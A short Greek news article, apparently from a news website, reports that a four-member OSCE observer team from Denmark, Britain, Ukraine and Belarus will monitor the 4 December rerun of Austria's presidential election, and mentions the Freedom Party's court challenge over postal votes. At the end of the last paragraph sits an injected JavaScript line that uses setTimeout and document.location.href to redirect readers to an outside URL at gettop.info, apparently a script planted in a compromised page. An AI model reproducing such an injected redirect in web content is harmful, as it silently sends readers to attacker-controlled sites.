Παρατηρητές του ΟΑΣΕ στις αυστριακές προεδρικές εκλογές της 4ης Δεκεμβρίου

0
4

 

Παρατηρητές του Οργανισμού για Ασφάλεια και Συνεργασία στην Ευρώπη θα δώσουν το «παρών» στον επαναληπτικό γύρο των αυστριακών προεδρικών εκλογών στις 4 Δεκεμβρίου.

Θα πρόκειται για μία τετραμελή ομάδα παρατηρητών, οι οποίοι θα βρεθούν στην Αυστρία από τις 28 Νοεμβρίου έως μία εβδομάδα μετά την εκλογική διαδικασία της 4 ης Δεκεμβρίου.

Σύμφωνα με το αυστριακό υπουργείο Εσωτερικών, οι παρατηρητές θα προέρχονται από τη Δανία, τη Βρετανία, την Ουκρανία και την Λευκορωσία, ενώ, ανεξάρτητα από την επιτροπή αυτή μπορούν να αποσταλούν παρατηρητές και από τις επί μέρους χώρες-μέλη του ΟΑΣΕ.

Στους παρατηρητές των εκλογών επιτρέπεται η είσοδος σε όλα τα εκλογικά κέντρα, όπως επίσης η παρουσία τους σε όλες τις συνεδριάσεις των εκλογικών υπηρεσιών, καθώς και στην καταμέτρηση των ψήφων, συμπεριλαμβανομένων και των επιστολικών ψήφων, που, κατά τον δεύτερο γύρο των προεδρικών εκλογών της 22ας Μαΐου, αποτέλεσαν αντικείμενο της προσφυγής του αντιπολιτευόμενου ακροδεξιού εθνικιστικού Κόμματος των Ελευθέρων στο Συνταγματικό Δικαστήριο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here